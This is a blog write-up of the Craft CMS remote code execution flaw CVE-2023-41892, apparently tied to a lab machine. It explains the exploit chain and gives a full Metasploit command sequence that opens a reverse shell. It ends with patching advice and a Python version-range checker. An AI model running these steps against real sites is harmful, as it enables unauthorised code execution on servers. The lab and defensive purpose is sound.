Craft CMS CVE-2023-41892 Vulnerability Exploitation | POC
We covered the CVE-2023-41892 proof of concept affecting Craft CMS, both manually and with the Metasploit framework. CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system.
Affected versions of Craft CMS allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.
Full blog post is here.
What is Craft CMS?
Craft CMS is a content management system designed to be simple and clear to use. It offers every mechanism needed for the everyday chores of running a functional website, and content integration is meant to be hassle-free.
The version of Craft CMS covered here is vulnerable to CVE-2023-41892, for which this POC is publicly available.
Like other content management systems, Craft CMS has a fairly small pre-authentication attack surface. However, the beforeAction method of the \craft\controllers\ConditionsController class allows an attacker to instantiate an object of any class.
The vulnerability affects Craft CMS version 4.0.0-RC1 through 4.4.14.
Understanding The Exploit
- The getTmpUploadDirAndDocumentRoot() function allows you to execute phpinfo, which reads the main web root in addition to the upload directory.
- The writePayloadToTempFile(documentRoot) function yields an HTTP 502 error indicating successful exploitation. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension.
- The trigerImagick(tmpDir) function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.
Some people reported problems running the exploit; if that happens to you, try this exploit instead or follow the Metasploit method outlined below.
Craft CMS Vulnerability Exploitation with Metasploit
sudo msfconsole
Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run
The exploit should then complete, and you can move on to the post-exploitation and privilege escalation phases.
Mitigation and Patching
The vulnerability is fixed by upgrading to Craft CMS version 4.4.15 or later.
Users can take the following steps to mitigate the vulnerability:
If your security key may have been compromised, rotate it. Run the php craft setup/security-key command and propagate the updated CRAFT_SECURITY_KEY environment variable to all production environments.
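As an added defensive check that is not part of the original post or of Craft's own tooling: a small Python script that decides whether an installed Craft CMS version falls inside the affected range stated above (4.0.0-RC1 through 4.4.14, fixed in 4.4.15), handling pre-release tags so that 4.0.0-RC1 sorts before 4.0.0. It also reads the installed craftcms/cms version from a project's composer.lock, assuming the standard Composer lock layout; the lock excerpt embedded below is constructed for the demonstration.

```python
import json
import re
from typing import Optional, Tuple

# Affected range as stated in the post: 4.0.0-RC1 through 4.4.14; fixed in 4.4.15.
AFFECTED_LOW = "4.0.0-RC1"
FIXED_IN = "4.4.15"

# major.minor.patch with an optional pre-release tag such as -RC1 or -beta.2
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?$")
PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
FINAL_RANK = 3  # a final release sorts after every pre-release of the same x.y.z


def parse_version(version: str) -> Tuple[int, int, int, int, int]:
    """Turn a Craft CMS version string into a tuple that sorts correctly."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    tag, num = m.group(4), m.group(5)
    if tag is None:
        return (major, minor, patch, FINAL_RANK, 0)
    if tag.lower() not in PRERELEASE_RANK:
        raise ValueError(f"unknown pre-release tag in {version!r}")
    return (major, minor, patch, PRERELEASE_RANK[tag.lower()], int(num or 0))


def is_affected(version: str) -> bool:
    """True when the version lies in [4.0.0-RC1, 4.4.15)."""
    v = parse_version(version)
    return parse_version(AFFECTED_LOW) <= v < parse_version(FIXED_IN)


def version_from_composer_lock(lock_text: str) -> Optional[str]:
    """Pull the installed craftcms/cms version out of a composer.lock file.
    Assumes the standard Composer layout: a 'packages' list of objects
    carrying 'name' and 'version' keys."""
    for pkg in json.loads(lock_text).get("packages", []):
        if pkg.get("name") == "craftcms/cms":
            return pkg.get("version")
    return None


# Constructed minimal composer.lock excerpt for demonstration (not a real site's file).
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "yiisoft/yii2", "version": "2.0.48"},
    {"name": "craftcms/cms", "version": "4.4.14"},
]})

if __name__ == "__main__":
    installed = version_from_composer_lock(SAMPLE_LOCK)
    print(installed, "affected" if is_affected(installed) else "not affected")
```

Point version_from_composer_lock at the real composer.lock of a Craft project to check a live install against the stated range.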